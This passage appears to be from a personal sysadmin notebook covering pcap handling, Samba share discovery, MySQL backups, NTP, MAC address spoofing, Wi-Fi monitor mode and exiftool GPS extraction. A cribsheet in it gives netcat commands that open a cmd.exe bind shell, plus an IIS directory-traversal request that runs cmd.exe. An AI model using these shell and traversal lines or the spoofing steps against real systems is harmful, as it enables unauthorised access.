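    elif magic == 0xD4C3B2A1:
        e = ">"  # written big-endian
    else:
        raise ValueError("not a classic pcap (pcapng and nanosecond variants not handled)")
    ghdr, phdr = struct.Struct(e + GLOBAL_HDR), struct.Struct(e + PKT_HDR)
    pkts, off = [], ghdr.size
    while off < len(data):
        if off + phdr.size > len(data):
            raise ValueError("truncated record header at offset %d" % off)
        ts_sec, ts_usec, incl_len, _orig_len = phdr.unpack_from(data, off)
        off += phdr.size
        if off + incl_len > len(data):
            raise ValueError("truncated packet data at offset %d" % off)
        pkts.append((ts_sec, ts_usec, data[off:off + incl_len]))
        off += incl_len
    return pkts


def write_pcap(pkts, snaplen=65535, linktype=LINKTYPE_ETHERNET):
    """Serialise packets back into a little-endian classic pcap (version 2.4)."""
    out = [struct.pack("<" + GLOBAL_HDR, 0xA1B2C3D4, 2, 4, 0, 0, snaplen, linktype)]
    for ts_sec, ts_usec, raw in pkts:
        out.append(struct.pack("<" + PKT_HDR, ts_sec, ts_usec, len(raw), len(raw)))
        out.append(raw)
    return b"".join(out)


def to_epoch(stamp):
    """'YYYY-MM-DD HH:MM:SS' -> epoch seconds, treated as UTC here (editcap uses local time)."""
    dt = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return int(dt.timestamp())


def slice_by_time(pkts, start=None, end=None):
    """editcap -A/-B: keep packets timestamped on or after start and on or before end."""
    lo = to_epoch(start) if start else None
    hi = to_epoch(end) if end else None
    kept = []
    for ts_sec, ts_usec, raw in pkts:
        ts = ts_sec + ts_usec / 1e6
        if (lo is not None and ts < lo) or (hi is not None and ts > hi):
            continue
        kept.append((ts_sec, ts_usec, raw))
    return kept


def split_by_count(pkts, per_file, prefix="output"):
    """editcap -c: chunk into files of per_file packets. Returns [(name, pcap_bytes), ...];
    the <prefix>-NNNNN naming is this example's own, not editcap's."""
    if per_file <= 0:
        raise ValueError("per_file must be positive")
    chunks = [pkts[i:i + per_file] for i in range(0, len(pkts), per_file)]
    return [("%s-%05d.pcap" % (prefix, n), write_pcap(c)) for n, c in enumerate(chunks)]


def dedup(pkts, window=5):
    """editcap -d (window 5) / -D N: drop a packet whose bytes equal any of the previous
    window-1 kept packets. Simplification: only kept packets fill the window."""
    kept, recent = [], []
    for pkt in pkts:
        if pkt[2] in recent:
            continue
        kept.append(pkt)
        recent.append(pkt[2])
        if len(recent) > window - 1:
            recent.pop(0)
    return kept


def constructed_pcap():
    """Constructed capture (not from the notes): five fake Ethernet frames on 2014-12-10
    at 10:10:59, 10:11:01, 10:15:30.5, 10:21:01 and 10:21:02."""
    base = to_epoch("2014-12-10 10:10:59")
    stamps = [(base, 0), (base + 2, 0), (base + 271, 500000), (base + 602, 0), (base + 603, 0)]
    frames = [(s, us, b"\x00" * 12 + b"\x08\x00" + b"payload-%d" % i)
              for i, (s, us) in enumerate(stamps)]
    return write_pcap(frames)


def demo():
    """Same as editcap -A '2014-12-10 10:11:01' -B '2014-12-10 10:21:01' followed by -c 2:
    returns (packets read, packets inside the window, output file names)."""
    pkts = read_pcap(constructed_pcap())
    window = slice_by_time(pkts, "2014-12-10 10:11:01", "2014-12-10 10:21:01")
    return len(pkts), len(window), [name for name, _ in split_by_count(window, 2)]
```

Both ends of the window are inclusive, as with editcap, so the packet stamped exactly 10:21:01 is kept while 10:21:02 is dropped.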
The IANA index of assignments for protocols (https://www.iana.org/protocols)
IPv4 Multicast Address Space Registry (https://www.iana.org/assignments/multicast-addresses/multicast-addresses.xhtml)
This command is a little-known secret of Samba. It returns the IP addresses of all Samba servers in one's own broadcast domain:
nmblookup __SAMBA__
nmblookup -S CAPCITY
Very cool
Another way to do this is via Avahi (Bonjour), as long as the servers are publishing:
avahi-browse -r _smb._tcp
[15:48:34 benb ~/Spells/enum4linux-master]
$ smbtree
WORKGROUP
CHURCH
	\\VOLUNTEER
		\\VOLUNTEER\print$      	Printer Drivers
		\\VOLUNTEER\IPC$        	Remote IPC
CAPCITY
	\\STAFFSRV              	bkupsrv server (Samba, Ubuntu)
		\\STAFFSRV\HP_Officejet_5740_series_710C28_	HP_Officejet_5740_series_710C28_
		\\STAFFSRV\IPC$         	IPC Service (bkupsrv server (Samba, Ubuntu))
		\\STAFFSRV\print$       	Printer Drivers
		\\STAFFSRV\bkupsrv      	Backup Server
	\\STAFF                 	CCCC Staff Server
	\\MEDIA                 	CCCC Media Server
		\\MEDIA\Users
		\\MEDIA\Media H         	Bios lists as 00:05 - in slot 6 - 2TB drive installed on 02/23/2014
		\\MEDIA\Media G         	Bios lists as 00:04 - in slot 5 - installed 02/23/2014
		\\MEDIA\K$              	Default share
		\\MEDIA\IPC$            	Remote IPC
		\\MEDIA\H$              	Default share
		\\MEDIA\G$              	Default share
		\\MEDIA\F$              	Default share
		\\MEDIA\E$              	Default share
		\\MEDIA\E
		\\MEDIA\C$              	Default share
		\\MEDIA\ADMIN$          	Remote Admin
	\\CCCCNAS
	\\BENB                  	Samba 4.7.6-Ubuntu
		\\BENB\Ricoh-MP-C4504ex 	Ricoh MP C4504ex
		\\BENB\OfficeRicoh      	Ricoh MP C4504ex
		\\BENB\IPC$             	IPC Service (Samba 4.7.6-Ubuntu)
		\\BENB\print$           	Printer Drivers
sudo mysqldump -u root -p inventory > ~/bkup/mysql/inventoryDB.20210406.sql
sudo mysqldump -u root -p people > ~/bkup/mysql/peopleDB.20210406.sql
Back up entire databases (inventory or people) in one dump:
$ mysqldump -u root -p --databases inventory people > ~/sakila_employees_20210406.sql
Restoring a MySQL database using mysqldump is simple. To restore the database, you must create an empty database. First, let us drop and recreate the sakila database by executing the following command.
mysql> drop database sakila;
Query OK, 24 rows affected (0.35 sec)
mysql> create database sakila;
Query OK, 1 row affected (0.01 sec)
To restore, feed the dump to the mysql client, not to mysqldump: mysqldump only produces dumps, it does not load the schema and data back. Execute the following command to restore the sakila database:
mysql -u root -p sakila < C:\MySQLBackup\sakila_20210406.sql
Once the command executes successfully, run the following to verify that all objects have been created in the sakila database.
mysql> use sakila;
Database changed
mysql> show tables;
Restore a specific table in the database
For instance, someone dropped a table from the database. Instead of restoring the entire database, we can restore the dropped table from the available backup. To demonstrate, drop the actor table from the sakila database by executing the following command on the MySQL command-line tool.
mysql> use sakila;
Database changed
mysql> drop table actor;
To restore the actor table, perform the following step by step process.
Step 1: Create a dummy database named sakila_dummy and restore the backup of the sakila database into it. Following is the command.
mysql> create database sakila_dummy;
mysql> use sakila_dummy;
mysql> source C:\MySQLBackup\sakila_20210406.sql
Step 2: Back up the actor table to the sakila_dummy_actor_20210406.sql file. Following is the command.
C:\Users\Nisarg> mysqldump -u root -p sakila_dummy actor > C:\MySQLBackup\sakila_dummy_actor_20210406.sql
Step 3: Restore the actor table from the “sakila_dummy_actor_20210406.sql” file. Following is the command on the MySQL command-line tool.
mysql> source C:\MySQLBackup\sakila_dummy_actor_20210406.sql
Execute the following command to verify the table has been restored successfully.
$ ip addr show
$ ip link set eno1 down
$ ip link set eno1 up
$ vi /etc/netplan/*.yaml
or
$ sudo nano 1-network-manager-all.yaml

network:
  ethernets:
    eno1:
      addresses: [192.168.1.13/24]
      gateway4: 192.168.1.1
      dhcp4: true
      optional: true
      nameservers:
        addresses: [8.8.8.8,8.8.4.4]
  version: 2
And then to apply the configuration, you run:
$ netplan apply
$ sudo ifconfig eno1 192.168.0.64 netmask 255.255.255.0
$ sudo route add default gw 192.168.0.239 eno1
https://danielmiessler.com/study/manually-set-ip-linux/#ip
route add -net 192.168.0.0 netmask 255.255.255.0 metric 1024 dev eno0
(with -net the address must be the network address, not a host; route rejects a mismatch between the address and the netmask)
ffmpeg -i inputfile.m4a -c:a libmp3lame -ac 2 -b:a 320k outputfile.mp3
$ mkdir newfiles
$ for f in *.m4a; do ffmpeg -i "$f" -codec:v copy -codec:a libmp3lame -q:a 2 newfiles/"${f%.m4a}.mp3"; done
ffmpeg -i show.m4a -c:a libmp3lame -q:a 8 output.mp3
ffmpeg -i inputfile.m4a -acodec libmp3lame -ab 93k outputfile.mp3
wlp2s0          c0:f8:da:79:de:fc
wlx7cdd90ebf32e 7c:dd:90:eb:f3:2e

[11:42:21 benb ~]
$ sudo macchanger -rb wlx7cdd90ebf32e
Current MAC:   7c:dd:90:eb:f3:2e (Shenzhen Ogemray Technology Co., Ltd.)
Permanent MAC: 7c:dd:90:eb:f3:2e (Shenzhen Ogemray Technology Co., Ltd.)
New MAC:       14:fc:eb:e6:a5:94 (unknown)
[11:42:41 benb ~]
$ sudo ifconfig wlx7cdd90ebf32e up
[11:48:17 benb ~]
$ sudo ifconfig wlx7cdd90ebf32e
wlx7cdd90ebf32e: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.151  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::2aa8:73f4:ceb5:3b75  prefixlen 64  scopeid 0x20
        ether 14:fc:eb:e6:a5:94  txqueuelen 1000  (Ethernet)
        RX packets 1178  bytes 536680 (536.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 512  bytes 78285 (78.2 KB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
[11:52:38 benb ~]
$ sudo airmon-ng start wlx7cdd90ebf32e

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
 1008 NetworkManager
 1009 wpa_supplicant
 4977 dhclient
 5030 avahi-daemon
 5034 avahi-daemon

PHY     Interface        Driver      Chipset
phy0    wlp2s0           wl          Broadcom Inc. and subsidiaries BCM43228 802.11a/b/g/n
phy1    wlx7cdd90ebf32e  rt2800usb   Ralink Technology, Corp. RT5572
                Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.
                (mac80211 monitor mode vif enabled on [phy1]wlan0mon
                (mac80211 station mode vif disabled for [phy1]wlx7cdd90ebf32e)
[15:07:43 benb ~]
$ sudo airmon-ng check kill

Killing these processes:

  PID Name
  935 wpa_supplicant
 6427 avahi-daemon
 6428 avahi-daemon

[15:07:53 benb ~]
[11:54:23 benb ~]
$ sudo airmon-ng start wlx7cdd90ebf32e

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
 5703 avahi-daemon
 5704 avahi-daemon

PHY     Interface        Driver      Chipset
phy1    wlan0mon         rt2800usb   Ralink Technology, Corp. RT5572
phy0    wlp2s0           wl          Broadcom Inc. and subsidiaries BCM43228 802.11a/b/g/n
[11:54:26 benb ~]
$ sudo nano /etc/kismet/kismet.conf
Change the "ncsource" variable to equal "wlan1mon" without quotes. Save the change.
Edit /etc/ntp.conf using your favorite text editor. Remove or comment out any lines starting with server, to prevent your machine from trying to mix smeared and non-smeared servers. Add the lines:
server time1.google.com iburst
server time2.google.com iburst
server time3.google.com iburst
server time4.google.com iburst
Restart the NTP daemon using sudo service ntp reload. https://developers.google.com/time/guides
Also time-a.timefreq.bldrdoc.gov
sudo nano /etc/ntp.conf
# Use servers from the NTP Pool Project. Approved by Ubuntu Technical Board
# on 2011-02-08 (LP: #104525). See http://www.pool.ntp.org/join.html for
# more information.
server 0.ubuntu.pool.ntp.org
server 1.ubuntu.pool.ntp.org
server 2.ubuntu.pool.ntp.org
server 3.ubuntu.pool.ntp.org
NTP runs over UDP port 123, not TCP, so the firewall rules must allow UDP:
sudo iptables -A INPUT -m state --state NEW -p udp --dport 123 -j ACCEPT
sudo ufw allow 123/udp
sudo service ntp reload
or
sudo service ntp restart
ntpdate -s 192.168.1.100
sudo ntpq -c lpeer
sudo tail -f /var/log/syslog
https://www.unixmen.com/syncronise-time-ntp-server-ubuntu-mintdebian/ and https://tecadmin.net/setup-time-synchronisation-ntp-server-on-ubuntu-linuxmint/
Make sure that your interface is down and you are running macchanger as root. First take down the network adapter in order to change the MAC address:
ifconfig wlan1 down
Now change your MAC address to a new random MAC address:
macchanger -r wlan1
Mimic being the burned-in MAC (-b/--bia only applies together with -r):
macchanger -b
Change only the host portion, not the vendor portion of the MAC:
macchanger -e wlan0
Restore the permanent MAC address to your network adapter manually:
macchanger --permanent wlan1
You can also spoof a particular MAC address:
macchanger -m [Spoofing MAC Address] wlan1
macchanger -m XX:XX:XX:XX:XX:XX wlan1
Bring up your network adapter with the new MAC address:
ifconfig wlan1 up
Show the current MAC address:
macchanger --show wlan1
Examples of production commands:
sudo macchanger -m 10:40:f3:ec:85:2f eth0
sudo macchanger -m e8:8d:28:20:64:32 eth0
/etc/init.d/networking stop
ifconfig eth0 hw ether 02:01:02:03:04:08
/etc/init.d/networking start
Place the following in the appropriate section of /etc/network/interfaces (within an iface stanza, e.g., right after the gateway line) so that the MAC address is set when the network device is started:
hwaddress ether 02:01:02:03:04:08
To change the MAC address at boot time with macchanger, add the following line to /etc/network/interfaces (example for the eth0 interface):
pre-up macchanger -m 12:34:56:78:90:AB eth0
In order to change the MAC address of any interface, you must bring that interface down before changing it.
ifconfig wlan0wan down
macchanger -m 00:11:22:33:44:55 wlan0wan
So here is what I want to do:
Show the current settings
sudo macchanger -s wlan0
First take the device down
sudo ifconfig wlan0 down
Change MAC on the fly to something completely random
sudo macchanger -r -b wlan0
Change MAC on the fly to something random while retaining the vendor portion
sudo macchanger -e -b wlan0
Make change permanent
sudo macchanger -e -b wlan0
Set to specific MAC
sudo macchanger --mac=XX:XX:XX:XX:XX:XX eth0
sudo macchanger --mac=fc:f8:ae:26:86:ee eth0
exiftool -r -ext jpg . -ee -p '$gpslatitude, $gpslongitude'
Warning: [Minor] Tag 'gpslatitude' not defined - 2006_NSAA_IT_Award1s.jpg
38 deg 10' 1.00" N, 84 deg 55' 19.00" W
38 deg 11' 5.22" N, 84 deg 49' 4.26" W
Warning: [Minor] Tag 'gpslatitude' not defined - Feb242014 016.jpg
38 deg 11' 24.00" N, 84 deg 50' 3.00" W
exiftool -r -ee -p '$gpslatitude, $gpslongitude' ./Tech/Inventory/NetGateBack.jpg
$ cd
[15:08:59 benb ~]
$ cd CCCC/
[15:09:00 benb ~/CCCC]
$ exiftool -r -ext jpg . -ee -p '$gpslatitude, $gpslongitude'
This is a cribsheet I had started, but it should be included here:
CribSheet
Updated: 04.13.2021 14:42:05
This is intended to be a very concise list of command line examples for reference. TheRedPill is intended to be much more detailed. This file will simply remind me of commands and examples of their basic use. Search this file for keywords to identify the command you are looking for. Use -h, --help, man, and apropos for more information regarding any tool or app.
---[netcat]---
$ nc -h                                    [syntax help screen]
$ nc -v -v -z -w2 127.0.0.1 1-139          [scan tcp ports 1-139]
$ nc -v -v -z -w2 127.0.0.1 21 25 80 139   [scan only tcp ports 25, 60 and 139]
$ nc -u -v -v -z -w2 127.0.0.1 21 1-139    [scan udp ports 1-139] UDP scans on NT do not work
$ nc -L -d -e cmd.exe -p 8080              [start the listener, and provide a console shell]
$ nc HostIPAddress ListeningPortNumber     [to connect to a listening port]
$ nc -v -v -z -w2 -n -p 53 127.0.0.1 80    [Send from Port 53, scan port 80, no name resolution]
Setup a listener
$ nc -v -v -l -d -e cmd.exe -p 5000
Get the shell
$ nc -v -v 127.0.0.1 5000
You can use nc to pull banners.
$ nc 127.0.0.1 80
HEAD / HTTP/1.0
$ nc 127.0.0.1 80 (enter once)
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
List established socket connections
$ sudo netstat -atnp | grep ESTABLISHED
List established services pretty
$ sudo netstat -atnp | grep "ESTABLISHED\|LISTEN" | awk '{printf "%-25s %-10s %-25s %-20s\n",$7,$1,$4,$5}' | sed /^-/d | sed 's/\// /g'
Find out which process is actually listening on that port
$ sudo fuser -v 631/tcp
Display current MAC address
$ macchanger -s wlp2s0
Change the MAC address to a random address
$ sudo macchanger -A wlp2s0
$ sudo ifconfig wlp2s0 up
$ ifconfig wlp2s0
Reset the interface to the original MAC address
$ sudo macchanger -p wlp2s0
Note that the "Capture ..." entries below are capture filters (BPF syntax, as used by tcpdump), while the rest are Wireshark display filters; the two syntaxes are not interchangeable.
Show only SMTP (port 25) and ICMP traffic:
tcp.port eq 25 or icmp
Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
Capture only traffic to or from IP address 172.18.5.4:
host 172.18.5.4
Capture traffic to or from a range of IP addresses:
net 192.168.0.0/24
net 192.168.0.0 mask 255.255.255.0
Capture only DNS (port 53) traffic:
port 53
Capture everything except ARP and DNS traffic:
port not 53 and not arp
For bad TCP you could try working with the filter:
tcp.analysis.flags
All packets from/to the IP address 192.0.73.2 that are error packets:
ip.addr==192.0.73.2 and expert.severity==error
TCP buffer full -- source is instructing destination to stop sending data:
tcp.window_size == 0 && tcp.flags.reset != 1
https://www.wireshark.org/docs/dfref/
ip.addr == x.x.x.x
ip.dst == x.x.x.x
ip.src == x.x.x.x
ip.addr == x.x.x.x && ip.addr == x.x.x.x
http or dns
tcp.port==xxx
ip.addr == 10.0.0.0/24
!(ip.addr == 10.43.54.65)
ip.addr == 10.43.54.0/24
tcp.dstport == 25
ip.addr == 10.43.54.65 and tcp.port == 25
tcp.flags.ack == 1
tcp.flags.syn == 1
arp
icmp
sip
ldap
malformed
dns
igmp
eth.dst == ff:ff:ff:ff:ff:ff
eth.addr == 00:70:f4:23:18:c4
(eth.dst[0] & 1)    # Wireshark multicast filter
bootp (dhcp)
wlan.ssid == SSID
!(arp or icmp or dns)
Designed to filter out certain types of protocols, it masks out arp, icmp, dns, or other protocols you think are not useful. This will allow you to focus on the traffic that interests you.
https://www.wireshark.org/docs/dfref/
https://medium.com/hacker-toolbelt/wireshark-filters-list-983c49468a45
https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/
Kismet I removed and deleted all I could find of Kismet and then downloaded and compiled it myself. This link was very helpful: https://www.kismetwireless.net/docs/readme/quickstart/ wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 2312 inet 192.168.3.112 netmask 255.255.255.0 broadcast 192.168.3.255 inet6 fe80::25bf:f187:9e44:9fda prefixlen 64 scopeid 0x20 ether 00:c0:ca:b1:5c:55 txqueuelen 1000 (Ethernet) RX packets 6316 bytes 5131565 (4.8 MiB) RX errors 0 dropped 227 overruns 0 frame 0 TX packets 2821 bytes 509808 (497.8 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 $ sudo ifconfig wlan1 down $ sudo macchanger -rb wlan1 Current MAC: 00:c0:ca:b1:5c:55 (ALFA, INC.) Permanent MAC: 00:c0:ca:b1:5c:55 (ALFA, INC.) New MAC: d8:5f:62:1b:fc:a4 (unknown) $ sudo ifconfig wlan1 up wlan1: flags=4099(UP,BROADCAST,MULTICAST) mtu 2312 inet 192.168.3.112 netmask 255.255.255.0 broadcast 192.168.3.255 inet6 fe80::44ad:62c7:252a:bc1f prefixlen 64 scopeid 0x20 ether d8:5f:62:1b:fc:a4 txqueuelen 1000 (Ethernet) RX packets 6665 bytes 5179704 (4.9 MiB) RX errors 0 dropped 272 overruns 0 frame 0 TX packets 3019 bytes 531003 (518.5 KiB) TX errors 0 dropped 3 overruns 0 carrier 0 collisions 0 To set a specific MAC and avoid 'locally-administered' bit being set. $ sudo macchanger wlan1 -b --mac 00:0f:00:23:34:a7 [WARNING] Ignoring --bia option that can only be used with --random Current MAC: 00:0f:00:57:09:33 (Legra Systems, Inc.) Permanent MAC: 00:0f:00:57:09:33 (Legra Systems, Inc.) New MAC: 00:0f:00:23:34:a7 (Legra Systems, Inc.) 
wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 2312
inet 192.168.1.236 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 2600:1700:43f0:d60:72bc:e13f:aba2:a9ca prefixlen 64 scopeid 0x0
inet6 2600:1700:43f0:d60::27 prefixlen 128 scopeid 0x0
inet6 fe80::b34d:e38a:ca25:1fcc prefixlen 64 scopeid 0x20
ether 00:0f:00:23:34:a7 txqueuelen 1000 (Ethernet)
RX packets 54662 bytes 31402813 (29.9 MiB)
RX errors 0 dropped 3328 overruns 0 frame 0
TX packets 38922 bytes 5847512 (5.5 MiB)
TX errors 0 dropped 6 overruns 0 carrier 0 collisions 0

-------- aircrack-ng
$ sudo airmon-ng check kill
Killing these processes:
PID Name
1530 wpa_supplicant
$ sudo airmon-ng start wlan1
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a)
phy1 wlan1 88XXau Realtek Semiconductor Corp. Realtek 8812AU/8821AU 802.11ac WLAN Adapter [USB Wireless Dual-Band Adapter 2.4/5Ghz] (monitor mode enabled)
$ iwconfig
wlan1 unassociated ESSID:"" Nickname:"(WIFI@REALTEK)"
Mode:Monitor Frequency=2.457 GHz Access Point: Not-Associated
Sensitivity:0/0
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=0/100 Signal level=0 dBm Noise level=0 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
$ ethtool -i wlan1
driver: rtl88XXau
version: 5.16.0-kali7-amd64
firmware-version:
expansion-rom-version:
bus-info: 1-4:1.0
supports-statistics: no
supports-test: no
supports-eeprom-access: no
supports-register-dump: no
supports-priv-flags: no

Use this wireshark filter to display only wifi handshakes:
wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol
Use this wireshark filter to get just one BSSID:
wlan.addr==28:28:5D:6C:16:24

---[This is another NIC]---
[ 105.708907] usb 1-4: new high-speed USB device number 2 using xhci_hcd
[ 105.859988] usb 1-4: New USB device found, idVendor=0bda, idProduct=a811, bcdDevice= 2.00
[ 105.859997] usb 1-4: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[ 105.860001] usb 1-4: Product: 802.11ac WLAN Adapter
[ 105.860003] usb 1-4: Manufacturer: Realtek
[ 105.860006] usb 1-4: SerialNumber: 00e04c000001
[ 106.367599] usb 1-4: 88XXau 00:0f:00:57:09:33 hw_info[107]
[ 106.374311] usbcore: registered new interface driver rtl88XXau
[ 107.535604] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready
[ 116.331413] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready

wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 2312
inet 192.168.1.251 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::d78b:91ea:d2b9:3edf prefixlen 64 scopeid 0x20(link)
inet6 2600:1700:43f0:d60:72bc:e13f:aba2:a9ca prefixlen 64 scopeid 0x0(global)
inet6 2600:1700:43f0:d60::f prefixlen 128 scopeid 0x0(global)
ether 00:0f:00:57:09:33 txqueuelen 1000 (Ethernet)
RX packets 207 bytes 31883 (31.1 KiB)
RX errors 0 dropped 119 overruns 0 frame 0
TX packets 31 bytes 4138 (4.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
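The 'locally-administered' bit that the macchanger -b note above is about, decoded in an added Python example (this is not code from these notes or from macchanger). It reads the ether/link lines of ifconfig and ip output and reports, for each address, whether the first octet has the multicast bit (0x01) or the locally-administered bit (0x02) set. The sample text is a constructed mix of the addresses quoted above plus two made-up ones (02:42:... and 01:00:5e:...) so every bit pattern appears; the function names are mine.

```python
import re
from typing import Dict, List

# Constructed sample: ether/link lines in the style of the ifconfig and ip
# output above. The first three MACs are the ones these notes show; the
# last two are made up to exercise the other bit patterns.
SAMPLE_LINES = """\
wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST)  mtu 2312
        ether 00:c0:ca:b1:5c:55  txqueuelen 1000  (Ethernet)
        ether d8:5f:62:1b:fc:a4  txqueuelen 1000  (Ethernet)
        ether 00:0f:00:23:34:a7  txqueuelen 1000  (Ethernet)
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
    link/ether 01:00:5e:00:00:fb brd ff:ff:ff:ff:ff:ff
"""

# Only the address right after "ether" / "link/ether"; the brd address is skipped.
_ETHER = re.compile(r"(?:link/)?ether\s+([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})")


def classify_mac(mac: str) -> Dict[str, object]:
    """Decode the two flag bits carried in the first octet of a MAC address.

    bit 0 (0x01): 1 = group/multicast address, 0 = individual (unicast)
    bit 1 (0x02): 1 = locally administered, 0 = universally administered
                  (a burned-in address whose first three octets are an OUI)
    """
    first_octet = int(mac.split(":")[0], 16)
    return {
        "mac": mac.lower(),
        "multicast": bool(first_octet & 0x01),
        "locally_administered": bool(first_octet & 0x02),
        "oui": mac.lower()[:8],
    }


def macs_in(text: str) -> List[Dict[str, object]]:
    """Classify every interface MAC found in ifconfig/ip-style output."""
    return [classify_mac(m) for m in _ETHER.findall(text)]


def locally_administered_macs(text: str) -> List[str]:
    """Addresses that a host set itself (MAC randomization, macchanger, VMs, containers)."""
    return [c["mac"] for c in macs_in(text) if c["locally_administered"]]


if __name__ == "__main__":
    for entry in macs_in(SAMPLE_LINES):
        print(entry)
```

The point for anyone reading DHCP or ARP logs: a set 0x02 bit is the only cheap sign that an address was chosen by the host rather than burned in, and as the macchanger -b option shows, a deliberately chosen address can keep that bit clear and borrow a real vendor OUI, so an inventory keyed on OUI or on this bit alone cannot prove which hardware is behind an address.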
# rsync options source destination

The following command syncs a single file on a local machine from one location to another. In this example the file backup.tar.gz is copied (synced) into the /tmp/backups/ folder.
# rsync -zvh backup.tar.gz /tmp/backups/

Here /root/rpmpkgs contains some rpm package files and you want that directory copied inside the /tmp/backups/ folder.
# rsync -avzh --progress /root/rpmpkgs /tmp/backups/

Common options:
-a archive
-v verbose
-z compress
-h human-readable
-r recursive
-u skip files that are newer at the destination

This command syncs a remote directory to a local directory. Here the directory /root/rpmpkgs on a remote server is copied to /tmp/myrpms on your local computer.
# rsync -avzh --progress root@192.168.0.141:/root/rpmpkgs /tmp/myrpms

The --include and --exclude options let you name the files and directories you want in the sync and those you do not want transferred. Rules are checked in the order given and the first match wins, so in this example rsync transfers only the files and directories whose names start with 'R' and excludes everything else.
# rsync -avz --include 'R*' --exclude '*' root@192.168.0.141:/var/lib/rpm/ /root/rpm

If a file or directory does not exist at the source but already exists at the destination, you might want to delete it at the destination while syncing.
# rsync -avz --delete root@192.168.0.151:/var/lib/rpm/ /root/rpm/

The --dry-run option makes no changes; it only shows what the command would do. If the output is exactly what you want, remove '--dry-run' from the command and run it for real.
# rsync --dry-run --remove-source-files -zvh backup.tar.gz root@192.168.0.151:/tmp/backups/
This is how to pull GPS coordinates from an image and display a map of the location. Run this command to report the GPS info. You can use a wildcard such as *.jpg.
$ exiftool -gps:all -c "%.6f degrees" 20190117_152351.jpg
GPS Latitude Ref : North
GPS Latitude : 38.189984 degrees
GPS Longitude Ref : West
GPS Longitude : 84.834734 degrees
GPS Altitude Ref : Above Sea Level
GPS Altitude : 0 m
GPS Time Stamp : 20:23:38
GPS Processing Method : CELLID
GPS Date Stamp : 2019:01:17
Using the info above, build the following string:
38.189984 N 84.834734 W
Enter this string as a Google search term and you will get a map.
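The step above (turning exiftool's GPS tags into the coordinate string) as an added Python example, not code from these notes. It parses a constructed copy of the exiftool output shown above, so it runs without exiftool installed, and the function names are mine. Run over a batch of images before they are published, it is the check that finds the ones still carrying a location.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed sample: the exiftool -gps:all output shown in these notes,
# reproduced as a string so the parser can run without exiftool.
SAMPLE_EXIFTOOL_OUTPUT = """\
GPS Latitude Ref                : North
GPS Latitude                    : 38.189984 degrees
GPS Longitude Ref               : West
GPS Longitude                   : 84.834734 degrees
GPS Altitude Ref                : Above Sea Level
GPS Altitude                    : 0 m
GPS Time Stamp                  : 20:23:38
GPS Processing Method           : CELLID
GPS Date Stamp                  : 2019:01:17
"""

# exiftool prints "Tag name : value"; the tag never contains a colon, so the
# first colon is the separator even when the value has colons (20:23:38).
_TAG_LINE = re.compile(r"^(?P<tag>[^:]+?)\s*:\s*(?P<value>.*)$")


def parse_exiftool(text: str) -> Dict[str, str]:
    """Turn exiftool's text output into a {tag: value} dict."""
    tags: Dict[str, str] = {}
    for line in text.splitlines():
        m = _TAG_LINE.match(line.strip())
        if m:
            tags[m.group("tag").strip()] = m.group("value").strip()
    return tags


def gps_decimal(tags: Dict[str, str]) -> Optional[Tuple[float, float]]:
    """Return signed decimal (lat, lon), or None when the image has no GPS fix.

    exiftool reports the magnitude and keeps the hemisphere in a separate
    Ref tag, so South and West must be negated here.
    """
    try:
        lat = float(tags["GPS Latitude"].split()[0])
        lon = float(tags["GPS Longitude"].split()[0])
    except (KeyError, ValueError, IndexError):
        return None
    if tags.get("GPS Latitude Ref", "North").startswith("S"):
        lat = -lat
    if tags.get("GPS Longitude Ref", "East").startswith("W"):
        lon = -lon
    return lat, lon


def search_string(tags: Dict[str, str]) -> Optional[str]:
    """Build the '38.189984 N 84.834734 W' form these notes paste into a search box."""
    coords = gps_decimal(tags)
    if coords is None:
        return None
    lat, lon = coords
    ns = "N" if lat >= 0 else "S"
    ew = "E" if lon >= 0 else "W"
    return f"{abs(lat):.6f} {ns} {abs(lon):.6f} {ew}"


if __name__ == "__main__":
    parsed = parse_exiftool(SAMPLE_EXIFTOOL_OUTPUT)
    print(gps_decimal(parsed))
    print(search_string(parsed))
```

For a real batch, feed the function the output of exiftool -gps:all on each file; an image that yields None carries no location. Once a location is found and should not be there, exiftool -gps:all= image.jpg deletes every GPS tag (exiftool keeps the untouched file as image.jpg_original).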
List packages
$ sudo apt list
List installed packages
$ apt list --installed
List packages that are upgradable
$ sudo apt list --upgradable
$ sudo apt update
$ sudo apt upgrade
$ sudo apt install (package name)
$ sudo apt remove (package name)
To encrypt a file:
